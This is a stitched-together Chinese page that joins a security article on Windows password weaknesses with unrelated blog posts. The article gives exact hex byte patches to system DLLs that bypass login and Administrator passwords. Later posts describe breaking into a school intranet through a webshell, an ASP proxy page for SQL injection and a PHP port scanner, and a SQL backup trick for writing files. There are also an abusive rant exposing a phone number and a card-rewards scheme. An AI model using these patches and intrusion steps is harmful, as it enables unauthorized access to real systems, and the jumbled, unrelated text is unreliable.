一、问题的提出        本文仅就此处所列的几个在实际工作里发现的问题，对目前普遍使用的视窗操作系统里隐藏的几个有关密码体系的危险弱点进行了分析并给出相应对策，这些危险弱点导致的计算机安全隐患，希望能引起相关用户的重视。   1、视窗操作系统“用户登录”对话框问题   图A是大家熟悉的“用户登录”对话框：   图A          大家都知道，只要愿意，现在可以通过很多能方便从互联网上下载的实用程式对图A所示的“TesT”用户进行“Crack”以获得其原先设定在TesT.PwL文件内的正确密码，尽管这需要耗些时间，目的是能假冒用户“TesT”登录操作系统或应用系统，以逃避安全审计系统。          问题是视窗操作系统其内置的密码安全体系存在很多弱点甚至缺陷，导致对于上述操作系统起码的安全环节——用户登录，只需对一个名为“■spwL”的系统动态链接库文件，仅仅修改其“一个”字节后，视窗操作系统这个起码的安全环节就告失效！利用这个弱点相比上述“Crack”方法几乎没有“时间成本”。   相关实验：         在视窗操作系统内找到名为“■spwL”的系统动态链接库文件，然后在常见的十六进制编辑器里搜索十六进制串{ B9 10 00 00 00 2B }后将其间的{ 10 }改为{ 00 }即上述十六进制串被改动一个字节后变为{ B9 00 00 00 00 2B }，即：   搜索 → B9   10   00  00  00  2B 替为 → B9   00   00  00  00  2B          保存这个改动，然后尝试再次登录，就会发现，所有在系统初始化文件里记录的用户，都可以任意的密码甚至仅仅一个回车键的形式轻松登录，而“合法”用户很难察觉。   2、视窗操作系统“标识登录”对话框问题 图B是大家熟悉的“标识登录”对话框：   图B          这个“标识登录”对话框最常见的是在用户试图使用视窗操作系统内置的OutLooK Express电子邮件组件时由视窗操作系统弹出。当用户选择自己的标识并输入正确的密码后即可通过OutLooK Express收发电子邮件。          同样地，大家可以在互联网上下载一些相关的实用程式来“Crack”上述“TesT” 标识的密码，然后可以假冒合法用户的标识收发邮件，但是通过这些实用程式执行后需要消耗时间才能获得结果。          同样地，我们发现视窗操作系统内置的密码安全体系存在的相关弱点，导致用户的“标识密码”形同虚设——只需对一个名为“■sidenT”的系统动态链接库文件，仅仅修改其“二个”字节后，视窗操作系统的这个安全环节也告失效。   相关实验：        在视窗操作系统内找到名为“■sidenT”的系统动态链接库文件，然后在常见的十六进制编辑器里搜索十六进制串{ 8A188AD33A19751A84D274128A5801}后将其间的{ 18 }改为{ 19 }及{ 58 }改为{ 59 }即上述十六进制串被改动二个字节后变为{ 8A198AD33A19751A 84D27412 8A5901 }，即：   搜索 → 8A  18  8AD3 3A19 751A 84D2 7412 8A  58  01 替为 → 8A  19  8AD3 3A19 751A 84D2 7412 8A  59  01          保存这个改动，然后尝试再次登录，就会发现，所有标识，都可以任意的密码甚至仅仅一个回车键的形式轻松登录！而被冒认的“标识”所有者很难察觉！   3、视窗操作系统“连接登录”对话框问题 图C大家熟悉的“连接登录”对话框： 图C          大家都知道，目前可以方便地通过实用程式，对密码形式的文本框进行“透视”。这里我们不讨论这些内容，我们希望通过对视窗操作系统的密码安全体系里存在的危险弱点进行讨论，让大家在自己的应用系统里避免类似的疏漏，让我们自己的的应用系统更为安全。          我们发现视窗操作系统内置的密码安全体系存在的相关弱点，导致上述“TesT”用户的密码在内存里竟以明码出现，根本无须“透视”而只要在内存里稍微探查一下即可。   相关实验：        使用运行在系统级的内存探查程序或调试器，我们可以轻而易举地在系统内存探查到图C的连接登录密码（图C“TesT”用户事先设定的密码是“Chinese!10-01-1949” ）：   视窗操作系统之“连接登录”密码内存探查结果[2] 地址80FD9E2A起  00 00 00 00 00 00 00 00-00 00 3F 03 8C 03 26 01  ..........?...&.  43 68 69 6E 65 73 65 21-31 30 2D 30 31 2D 31 39  Chinese!10-01-19  34 39 00 00 00 00 00 00-00 00 00 00 00 00 00 00  49..............  00 00 67 03 B4 03 22 01-54 65 73 54 00 00 00 00  ..g...".TesT....   在上述探查结果里，我们可以轻易发现“TesT”用户的连接密码为“Chinese!10-01-1949”。   4、视窗操作系统“共享登录”设置对话框问题 图D是大家熟悉的“共享登录”设置对话框： 图 D          大家知道，上述对话框同样可以方便地通过实用程式，对密码形式的文本框进行“透视”。这里我们不讨论这些内容，我们换一个角度来讨论。          我们发现视窗操作系统内置的密码安全体系存在的相关弱点，同样导致上述“TesT”用户的“只读”密码以及“完全访问”密码在内存里以明码出现，根本无须“透视”而只要在内存里稍微探查一下即可。   相关实验：        使用运行在系统级的内存探查程序或调试器，我们可以轻而易举地在系统内存探查到图D的共享登录设置密码（图D“TesT”用户事先设定的“只读”密码以及“完全访问”密码分别是“TesTTesT” 及“!!GoTo!!”——最多八个字符）：   视窗操作系统之“共享登录”设置密码内存探查结果 地址816B55D2起 00 00 B6 0F 00 00 00 40-00 00 E7 02 64 03 2A 01  .......@. 54 65 73 54 54 65 73 54-00 00 00 00 00 00 00 00  TesTTesT. 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ......... 00 00 3F 03 8C 03 26 01-00 00 00 00 00 00 00 00  ..?...&.. 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ......... 00 00 00 00 00 00 00 00-00 00 67 03 B4 03 22 01  ......... 54 65 73 54 00 00 00 00-00 00 00 00 00 00 00 00  TesT..... 地址816B57F2起 00 00 06 00 00 00 00 00-05 00 57 04 74 06 2E 01  ......... 21 21 47 6F 54 6F 21 21-00 00 00 00 00 00 00 00  !!GoTo!!.          在上述探查结果里，我们可以轻易地发现“TesT”用户的“只读”密码为“TesTTesT”同时其 “完全访问”密码为“!!GoTo!!”）。   二、问题的分析及对策 1、关于视窗操作系统“用户登录”对话框问题        我们将视窗操作系统内“用户登录”密码研判的核心代码列出来分析如下。   ：              ：  以上进行了多次单向HasH运算并得到长度为128位的HasH串（具体算法分析略）然后与保存在对应PWL文件内的正确值比对，详见以下代码。 ：              ： 7FA71D97 B910000000 mov ecx, 00000010 ；HasH串为128位即16个字节 7FA71D9C 2BC0       sub eax, eax      ；初始化EAX寄存器 7FA71D9E F3         repz              7FA71D9F A6         cmpsb             ；进行128位HasH串比对 7FA71DA0 7405       je 7FA71DA7     ；相等，系统认为用户密码正确 7FA71DA2 1BC0       sbb eax, eax      ；否则置密码比对错误标志 7FA71DA4 83D8FF     sbb eax, FFFFFFFF 7FA71DA7 85C0       test eax, eax     ；测试密码比对标志位 7FA71DA9 B8261C0000 mov eax, 00001C26 ；预置密码错误消息 7FA71DAE 7502       jne 7FA71DB2      ；密码比对错误，则转 7FA71DB0 33C0       xor eax, eax      ；否则置密码比对正确位 7FA71DB2 5F         pop edi           ；恢复现场 7FA71DB3 5E         pop esi           ；恢复现场 7FA71DB4 5B         pop ebx           ；恢复现场 7FA71DB5 8BE5       mov esp, ebp      ；恢复现场 7FA71DB7 5D         pop ebp           ；恢复现场 7FA71DB8 C20400     ret 0004          ；返回 ：              ：   从上述分析可见，当我们将密码比对的长度由“0x10H” 改为“0”——也就是将上述       将    mov ecx, 00000010  改为 → mov ecx, 00000000   仅仅改动“一个”字节，“用户登录”密码的比对结果就将“永远”正确。          仅仅依赖一条“repz cmpsb”指令对系统级的密码进行决定性研判是相当危险的，而仅仅通过一条件语句来选择视窗操作系统的密码安全类指令的决定性流向，其实是很“传统”的低级做法，保护效果相当脆弱。因为不论操作系统采用的单向HasH结果长度多么“惊人”也不论操作系统在执行“repz cmpsb”这条研判指令之前进行了多少轮大负荷的迭代编码，我们只要在这一条“关键路径”上实施“点穴”——这个层次的安全保护即告失效。   对策：        视窗操作系统在这里的最大“疏忽”就是对“苦心积虑”最后获得的128位HasH串仅仅参与简单的比对，并没有进行更有效的利用，建议：          将上述最后运算出来的128位HasH串不论其对错都作为新一轮解码迭代运算的输入算子，对后续的部分关键代码或数据实施解码，这样用户输入正确的密码后自然能正确地继续装载视窗操作系统，否则只能导致错误提示而无法继续正确地装载视窗操作系统。          事实上这是一个明显的安全漏洞。不要认为存储设备上的系统级文件设置了“只读”、“隐藏”等权限，就可以高枕无忧。事实上，只要系统的存储设备可以被“物理”地读写，那么对其上敏感的系统级文件进行“篡改”就不会是一件“相当”困难的事情。而在大多数情况下，这件事还是比较容易做到的。有关这个安全漏洞的更进一步讨论，我们将在《脆弱的软件著作权保护方式及对策》一文里进行，并相应地给出一个有效的解决方案。   2、关于视窗操作系统“标识登录”对话框问题        我们将视窗操作系统内“标识登录”密码研判的核心代码列出来分析如下。   ：   ：          ┏ ECX、EAX分别指向用户输入密码及正确密码 797972C3 8D4DE8       lea ecx, dword ptr [ebp-18] 797972C6 8D85E8FDFFFF lea eax, dword ptr [ebp+FFFFFDE8]                797972CC 8A18       mov bl, byte ptr [eax] ；获取第一个密码字符 797972CE 8AD3       mov dl, bl             ；保存起副本 797972D0 3A19       cmp bl, byte ptr [ecx] ；与正确的密码比对 797972D2 751A       jne 797972EE            ；第一个密码字符不正确 797972D4 84D2       test dl, dl             ；为最后一个密码字符？ 797972D6 7412       je 797972EA            ；是则转 797972D8 8A5801     mov bl, byte ptr [eax+01] ；获取下一密码字符 797972DB 8AD3       mov dl, bl             ；保存其副本   797972DD 3A5901     cmp bl, byte ptr [ecx+01] ；与正确的密码比对 797972E0 750C       jne 797972EE           ；比对不成功则转 797972E2 40         inc eax                 ；调整当前密码字符指针 797972E3 40         inc eax                 ；调整当前密码字符指针 797972E4 41         inc ecx                 ；调整正确密码字符指针 797972E5 41         inc ecx                 ；调整正确密码字符指针 797972E6 84D2       test dl, dl             ；为最后一个密码字符？ 797972E8 75E2       jne 797972CC           ；尚未比对完则转 797972EA 33C0       xor eax, eax            ；比对结束并且全部正确 797972EC EB05       jmp 797972F3           ；转后续测试标志位 797972EE 1BC0       sbb eax, eax           ；比对结束但是不正确 797972F0 83D8FF     sbb eax, FFFFFFFF      ；置错误标志位 797972F3 85C0       test eax, eax          ；测试标志位 797972F5 7434       je 7979732B            ；密码比对正确则转 ：              ：          从上述分析可见，当我们将密码比对的二个指针EAX、ECX均指向同一个地址——也就是将上述   将    mov bl, byte ptr [eax] 改为 → mov bl, byte ptr [ecx] 将   mov bl, byte ptr [eax+01]  改为 → mov bl, byte ptr [ecx+01]          仅仅改动“二个”字节，“标识登录”密码的比对结果就将“永远”正确。这同样是一个明显的安全漏洞。这个漏洞源自明文密码比较的指令过于接近，很容易通过对有关的指令代码进行“篡改”达到“冒名”攻击的目的。   对策：       首先我们要尽可能避免明文密码的比较，并尽可能地将明码密码“暗码”化，即将明文密码通过稳健的摘要密码算法“撕碎”后“淹没”在长度至少在128位的高强度单向散列串里（具体参考我们发表的《大型Web应用软件系统的安全登录隐患及对策》一文），如果实在没有这个“耐性”做这项工作，那至少要考虑将密码研判的有关指令“离散”化而不象现在这般前后“紧密”相连，更为安全的做法请参考我们完成的《脆弱的软件著作权保护方式及对策》一文，里头相应地给出一个有效的解决方案。   3、关于视窗操作系统“连接登录”对话框问题        原因在于视窗操作系统对这类密码解码及研判，既没有如“用户登录”对话框般采用比较安全的“OpeNPassworDCachE”方法对有关内存进行分配，也没有对有关密码存储的内存在研判后进行必要“清零”。所以我们可以轻而易举地通过内存探查，找到用户的上述敏感数据。   对策：        首先考虑启用较安全的“OpeNPassworDCachE”方法对有关内存进行分配，并确保密码比较后必须立即执行有关密码内存单元的“清零”工作，以抵御内存探查工具“窥视”攻击。如果需要更安全的密码研判，就应该尽可能避免在内存里出现明文密码，具体做法请参考我们完成的《脆弱的软件著作权保护方式及对策》一文，里头相应地给出一个有效的解决方案。   4、关于视窗操作系统“共享登录”设置对话框问题        原因在于视窗操作系统对这类密码解码及研判，既没有采用比较安全的“OpeNPassworDCachE”方法对有关内存进行分配，也没有对有关密码存储的内存在研判后进行必要“清零”。所以我们可以轻而易举地通过内存探查，找到用户的上述敏感数据。   对策：       首先考虑启用较安全的“OpeNPassworDCachE”方法对有关内存进行分配，并确保密码比较后必须立即执行有关密码内存单元的“清零”工作，以抵御内存探查工具“窥视”攻击。如果需要更安全的密码研判，就应该尽可能避免在内存里出现明文密码，具体做法请参考我们完成的《脆弱的软件著作权保护方式及对策》一文，里头相应地给出一个有效的解决方案。 三、结论        对于被具有起码强度的稳健单向HasH算法保护的产品，简单并可能有效但是未必高效的攻击当然首先考虑的是穷举，当然其规模不能太大，但是对于视窗操作系统产品而言，在大多数情况下就连穷举都可以省略，直接“Crack”或直接进行内存探查就能达到目的，这是因为其没有对系统指令代码及密码等敏感数据所在内存的安全性进行必要的维护以及保护：   （1）对于系统指令代码而言，视窗操作系统大都以常规形式读写、执行，缺乏对关键指令代码进行必要的校验，以防止其在系统内存里被“篡改”。   （2）对于密码数据而言，视窗操作系统将“还原”后的密码在“使用”完毕后仍以明码形式遗留在系统内存里，而“密码存储内存在密码研判后进行清零”——这是稍有些密码安全知识的人的常识性做法，何以视窗操作系统生产商却出现如此疏忽？          目前我们尚未获得视窗操作系统生产商在其本土销售的版本，如果相关的分析表明仅仅在其国际版本里才存在本文讨论的这些密码安全体系弱点，抛开其开发成本或稳定性等托词，其真正用意值得大家深思。          大家也不要认为视窗2K等版本相对而言较安全，就抱着侥幸心理以为没有上述有关密码安全体系方面的弱点。我们的分析包括了视窗2K等版本，就“用户登录”对话框问题而言，视窗2K等版本操作系统同样存在上述安全隐患。只需对一个名为“■sv1_0”的系统动态链接库文件，仅仅修改其“一个”字节后，视窗2K等版本操作系统起码的安全环节就告失效。可轻松以超级用户“Administrator”登录，利用这个弱点无须“Crack”，有关的“时间成本”几乎为零！所以本文的讨论还是有代表性的。希望能引起大家必要的重视。   视窗2K版本的相关实验：        在视窗2K版本操作系统内找到名为“■sv1_0”的系统动态链接库文件，然后在常见的十六进制编辑器里搜索十六进制串{ F8 10 0F 84 71 FF FF }后将其间的{ 10 }改为{ 00 }即上述十六进制串被改动一个字节后变为{ F8 00 0F 84 71 FF FF }，即：   搜索 → F8   10   0F  84  71  FF  FF 替为 → F8   00   0F  84  71  FF  FF   保存这个改动，然后尝试以超级用户“Administrator”登录，就会发现相关的密码安全弱点。   对策：        这个例子所揭示的安全弱点的有关对策请参考我们完成的《脆弱的软件著作权保护方式及对策》一文，里头有更为详尽的分析。            事实证明，对于不借助可热插拔的移动存储介质保存密码（密钥）以及缺乏稳健的密码安全体系的视窗操作系统，目的明确并具备起码专业技能的人员“入侵”视窗操作系统并不是一件困难的事情。（作者单位  Abusys公司）     [1] 本文仅供参考，如果读者希望重复实验及数据，请一定严格按照本文依照原样提供的所有指令执行，尽管我们知道本文的所有实验例子都可以安全地被重复，但是读者行动之前请记住，我们对因此产生的结果不作任何形式的担保。 [2]本文所附图之具体地址数值不必拘泥。

广告刊例 在线调查 投稿指南 联系我们     Copyright © 2005 NetWork & Computer Security . All rights reserved . 备案序号：京ICP备05009980号

前段时间, 因为迷上游戏,从黑鹰辞职了,要不,我现在也在享用免费午餐呢~~

只觉得对不起一个朋友,才毕业的,我把他介绍到了黑鹰,他过完年才去的.

唉,谁想到这样的结果呢?

还有一篇随手写的

随手写了发在某bbs上的，很短，直接贴算了。

差异备份最早提出来可能是??????或者什么人，最近安焦出的一本书上有过一些说法，应该存在问题，这里就不讨论了。关于备份本身的改进也没有什么好说的，只是单独提一下差异备份。
从感性上认识，差异备份就是把前后不同的地方提出来，这样对于成功率而言，确实有很大的提高，一个典型的过程是：

create table cmd(str image);
backup database xxxx to disk='somewhere';
insert into cmd(str) values ('something');
backup database xxxx to disk='destination' with differential,format

这里的差异，是一种增量差异，感性上的结果是增加的部分包括增加的记录项。
那么，我们考虑了，增加的记录项带来的差异较大呢，还是修改记录项带来差异大呢？很有可能是后者，那么，这个差异备份可以被改进为：

create table cmd(str image);
insert into cmd(str) values ('something');
backup database xxxx to disk='somewhere';
update xxxx set str='newthing';
backup database xxxx to disk='destination' with differential,format

马上测试一下，结果……大家自己看~
另外，上面的something和newthing长度必须考虑。很明显newthing比something长的话，产生的差异太大了不好控制，如果是等长的话，也难说。所以最好是newthing比something短。

假设

something = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
newthing = 'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'

差异备份试验下，包含的字符串是：

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAA
... ...
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

后面还有一个拷贝，没关系，response.end就可以了。
自己做实验，不妨删表然后压缩，效果还要好一些，这里就不废话了

一、网络欺骗方法探幽

1、诱饵：Honey Pot和分布式Honey Pot

2、真假“李逵”：空间欺骗技术

3、用户信息迷惑：组织信息欺骗和多重地址转换

4、网络信息迷惑：网络动态配置和网络流量仿真

二、欺骗实例之“诱敌深入”

1、关于Sendmail的一些知识

2、序幕

3、较量

4、寻踪

都取了.可是qq财富通里的钱就取不出来了.

最近玩游戏玩疯了, 很久没有上blog了.今天有人告诉我我blog上有人在说一些不堪入耳的话.

本来想一删了之,后来想想这样倒容易叫人产生误会,以为我真和那个sb有什么.

那个sb我问你,你要真和我象你说的那样你不会连我电话号码都不知道吧, 报上来听听?

还有我现在在什么地方?我叫什么名字?我的银行卡上用的什么名字?我是哪年的?

你不会不知道吧?

草你妈还一夜情呢, 你个sb再泡上10年你看会不会有你妈的情!

去baidu搜索了下,

http://www.baidu.com/s?wd=13478959843&cl=3

结果搜索到了一条相关内容:

http://www.52blog.net/user1/5968/archives/2005/284604.shtml

今天中午13:10我拨打了下,说是关机.

草他妈的,真的林子大了,什么鸟都有.说的还真象那么回事.

广告做到这个份上,也够可以的了.

有没有朋友知道什么好办法整治一下.

对了, 要是qq19418 问大家借钱或者请求帮助什么的不要理他.

我现在的新qq87187, 有想加的朋友加吧, 不过最近上的少了, 总在玩游戏.

有时候我玩玩游戏, 再突然回到这个圈子里真有点恍若隔世的感觉.

唉, 生活就是这的吧~`

最后祝大家天天进步, 不要象我这样颓废了......

卡神－杨蕙如

今天看凤凰卫视报道了一个台湾的卡神,这位27岁名叫杨蕙如的台东女硕士，每月刷卡近千万（约250万），最牛的是靠刷卡来赚钱，三个月来已赚取上百万元。
赚钱过程没有讲得特清楚，自己找了一些报道分析了一下，方法应该是这样的：
在台湾有“东森礼券”，就是电视购物频道的购物券，可以使用信用卡来预付费，而且东森台有活动，花1万9就可以获得2万块的东森礼券，如礼券到期未使用，可以选择兑换2万元等值支票或换取2万元等值提货券，再加上4000块的购物折扣券。
按照国内的1年期整存整取利息2.25来算，1年后24000元的现值应该是24000/1.0225=23471.88，太划算了，另外，中信商银（台湾的银行）只要每月预付800元会费，即可享受刷卡消费红利点数（类似国内的积分）8倍的优惠，外加千分之二的电信回馈金，杨小姐存好1年的年费后，找亲友集资600万作为提高个人信用额度及担保，一口气购买东森礼券600万元，然后亲友使用的杨小姐的联名卡，在网络上买下东森礼券，然后亲友又把礼券卖给杨小姐，来回捣腾，以至于可以获得800多万的红利点，换得n张头等舱机票，然后卖掉……

我失业后估计也会去搞类似的事情，不过不知道这种事情能否长久，要搞还是应该去国外去搞。

 饿 狼  (156219944) 05:17:41
今天下载了个Realplayer牛X版网页木马生成器,打算做免杀的.

然后,发现index.htm的源代码很奇怪,好象是加密了,最下方调用了ENCODE过的JS文件.

http://www.wocao.net/js/wocao.ocx这个就是改了扩展名的JS文件,一样可以用.

然后我就下载了wocao.ocx文件,解了密,还是看不懂是什么意思.

过了一会,发现http://www.wocao.net/js/wocao.ocx这个地址打不开了。很奇怪.

并且http://www.wocao.net/js/这个目录也不存在,而且需要密码.

我判断,一定是www.wocao.net这个域名更新了指向的IP.指到一个普通的虚拟主机服务器上了.

当我把INDEX.HTM解密后,发现最下方有这么一段代码:

<script src=\"http://www.wocao.net/js/wocao2.ocx\" language=\"JScript.Encode\"></script>

大家注意,这里的地址http://www.wocao.net/js/wocao2.ocx和http://www.wocao.net/js/wocao.ocx这个地址很像,但不一样的。很明显,为了迷惑大家!!!~

我正准备看http://www.wocao.net/js/wocao2.ocx的内容时,才发现,www.wocao.net已经把域名指向给换了。.

日 !!

那个wocao2.ocx代码里一定加载了木马!!!!

还有,music.smi文件的SHELLCODE也有问题。本来是256个字节长度就可以触发缓冲区溢出漏洞的，结果他却把SHELLCODE弄得好大,有1.3几KB!!!!

知道这意味着什么么?很有可能在SHELLCODE里加了另一段后门代码!!

另外,根据作者BLOG上的留言评论来看,这个网马是加了后门的。口碑不好,请大家不要使用!!!

网页木马本身的逻辑也有问题。

当我把index.htm解密后,发现,INDEX.HTM根本就没调用到MUSIC.HTM文件,可生成器却说要调用,日!!!骗局!!!

不知道他搞什么名堂...

总之,一句话,这款网页木马就是垃圾,有不止一个后门!!!!请大家鄙视!!!

谢谢大家!!这是我忙了一个晚上的成果,谢谢!!

转载请注明作者和出处

内网渗透碰到一些问题,不过又发现一点好玩的东西.
拿出来给大家看下,高手见笑了.
注：这个是我们学校,请大家不要破坏,谢谢.不然我就死了.:(

考试成绩出来了,查分只能在校园内网教务处的站查(http://jwc.***.edu.cn),外网访问不了的.
郁闷,上机卡丢了,不想跑去学校机房,想突破下.
狗*运,竟然得到了www2.***.edu.cn的webshell
方法:注射,上传,溢出,别的我也不会了.
P颠P颠的登上去,WScript.Shell都没禁止,上天真是厚待我啊.
准备直接开个代理,内网渗透开始-_-|
顺手一个ipconfig,傻了.两个IP根本就不一样.
202.***.144.7
220.1**.195.134

简单分析下:
校园网有两条线,一个是本地的ISP分配给的公网IP,一个是教育网.
外部网络(本例为我)通过ISP访问学校网站,路由将80端口的数据转向给内部的一台主机HTTP服务.

现在的思路是利用lcx,再反弹出一个SOCK的代理服务.
但是这里老出问题,连上我的总是ISP的IP,还是不能访问内网.

郁闷到死,我演示一下的好.220.1**.195.129

换个思路.
ASP里面有个不错的函数,大家也用的很多,就是XMLHTTP,大家用的iget.vbs还有就是大家熟悉的ASP小偷程序都有应用.这也是前几天生成静态页面时想出来的.

代码：(xml.asp)

<%'容错处理
On Error Resume Next
%>
<%
Function getHTTPPage(url)
    dim objXML
    set objXML=server.createobject("MSXML2.XMLHTTP")'定义
    objXML.open "GET",url,false'打开
    objXML.send()'发送
    If objXML.readystate<>4 then '判断文档是否已经解析完，以做客户端接受返回消息
        exit function
    End If
    getHTTPPage=BytesToBstr(objXML.responseBody)'返回信息，同时用函数定义编码
    set objXML=nothing'关闭
    if err.number<>0 then err.Clear
End Function

Function BytesToBstr(body)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
    objstream.Type = 1
    objstream.Mode =3
    objstream.Open
    objstream.Write body
    objstream.Position = 0
    objstream.Type = 2
    objstream.Charset = "GB2312" 
    '转换原来默认的UTF-8编码转换成GB2312编码，否则直接用XMLHTTP调用有中文字符的网页得到的将是乱码
    BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function

%>
<%'生成HTML页面
Dim Url,Html
url=request("url")
if url<>"" then
Html = getHTTPPage(Url)
response.write Html
end if
%>
<form action="" method=post>
内网：<input type=text name=url size="100" value=<%=url%>>
<input type=submit value="提交拉">
</form>

我们来实验一下,因为相对路径的问题,不能显示图片,和有的链接.(不知道相对路径的自己google)
看.返回了页面,一个ASP的系统哦.大家也都知道校园网的安全-_-!
来找下注射点,随便一个,注意相对路径.
and 1=1返回正确
and 1=2哈,出错了!
再来and 1=@@version;
有了工具后,我可不喜欢手工来,累死.
翠花,上工具,准备工作是我们要重新写下代码.
很简单将URL定死,只接受我们的构造语句.

-----------------a.asp---------------------------
url=request("id")
if url<>"" then
url="http://jw.***.edu.cn/sjyjwc/gzjb/gzjb.asp?id="&url

--------------------------------------------------
最后成格式成a.asp?id=1这样的,便于工具利用.
看我演示.其实只要有exec master..xp_cmdshell 'dir',直接执行程序.
就省下了很多事情,可惜我这里不行,只是给大家思路.汗~

其实我们不仅仅拿来注射内网,还可以拿来做代理扫描的.
只要将刚才的地址修改就可以了。再来演示一下。
我们看一下这时的连接，看到了本机访问肉鸡的IP，和肉鸡访问的本机的记录，两个IP不一样，难道内网机器通过代理上网?不大明白了。
-----------------------------------------------
9    60.0.*.5        80      220.1*4.1**.129   41524  
10   60.0.*.5        1284    220.1*4.1**.134   80     

到这里就该结束了，最后说下内网注射的缺点，在交互的页面，也就是说如果只能扫描出web管理员的用户名和密码，如何找出管理登陆的页面和如何登陆就是个大问题了。还在想……

有个折中的办法，如果我们得到内网的一台普通的机器，运气好的话，返回的是它的内网IP，这些问题就解决了。(没有测试环境，猜测中。)
lcx+sock我们就可以把自己也变成内网。现在是如何得到内网的IP?

有两种方法，主页挂马，得到内网用户的IP。不喜欢，这样我主页我就保不久了。
另外一种，自己扫描，没怎么找到命令行下的工具，nmap有点庞大，就自己写了一个在线的IP扫描器，修改angel的端口扫描器。

找到打开135，139的机器，试试IPC和MS05039溢出。

后面未验证，有什么错误，请大家指正，谢谢。

附我的ip扫描器代码：

<?php

//Codz by angel
error_reporting(7);
$youip=$_SERVER["REMOTE_ADDR"]; // 获取本机IP地址
$remoteip=$_POST["ip1"]; // 获取表单提交的IP地址
$ip2=$_POST["ip2"]; // 获取表单提交的IP地址
$port=$_POST["port"]; // 获取表单提交的IP端口
?>
<html>
<head>
<title>LoveXia IP扫描器</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style TYPE="text/css">
<!--
BODY { FONT-SIZE: 12px; FONT-FAMILY: Verdana;color:#000000;
}
TD {
FONT-SIZE: 12px;
FONT-FAMILY: Verdana;
color:#000000;
line-height: 14px;
}
.style1 {color: #FFFFFF}
-->
</style>
</head>
<body>
<center>
<?php
if (!empty($remoteip)){
// 如果表单不为空就进入IP地址格式的判断

function err() {
die("对不起，该IP地址不合法<p><a href=javascript:history.back(1)>点击这里返回</a>");
}
// 定义提交错误IP的提示信息

$ips=explode(".",$remoteip);
// 用.分割IP地址

if (intval($ips[0])<1 or intval($ips[0])>255 or intval($ips[3])<1 or intval($ips[3]>255)) err();
// 如果第一段和最后一段IP的数字小于1或者大于255，则提示出错

if (intval($ips[1])<0 or intval($ips[1])>255 or intval($ips[2])<0 or intval($ips[2]>255)) err();
// 如果第二段和第三段IP的数字小于0或者大于255，则提示出错
$ip=$ips[0].".".$ips[1].".".$ips[2].".";
// 通过IP格式的检查后用数组定义各端口对应的服务名称及状态

echo "<strong>您扫描的IP：<font color=red>".$remoteip."</font></strong>\n";
echo "<a href=ip.php><font color=#000000>继续扫描>>></font></a><p>\n";
// 输出显示的表格

for($i=$ips[3];$i<$ip2;$i++)
{
$fp = @fsockopen($ip.$i, $port, &$errno, &$errstr, 1);
if (!$fp) {
echo $ip.$i."--------".$port."is closed<br>\n";
} else {
echo "<strong><font color=red>".$ip.$i."--------".$port."is open</font></strong><br>\n";
}
}
// 用for语句，分别用fsockopen函数连接远程主机的相关端口，并输出结果
exit;
}
// 探测结束

echo "<table border=0 cellpadding=15 cellspacing=0>\n";
echo "<tr>\n";
echo "<td align=center><strong>您的IP：<font color=red>".$youip."</font></strong></td>\n";
echo "</tr>\n";
echo "<form method=POST action=ip.php>\n";
echo "<tr><td>\n";
echo "ip:<input type=text name=ip1 size=12>-\n";
echo "<input type=text name=ip2 size=5>\n";
echo "port:<input type=text name=port size=5>\n";
echo "<input type=submit value=扫描 name=scan>\n";
echo "</td></tr>\n";
echo "</form>";
echo "</table>\n";
// 如果表单为空则显示提交IP地址的表单

?>

<TABLE cellSpacing=0 cellPadding=10 width="100%" border=0>
<TR>
<TD align=center><b>Jackal Change Security Angel Portscanner</b></TD>
</TR>
</TABLE>
</center>
</body>
</html>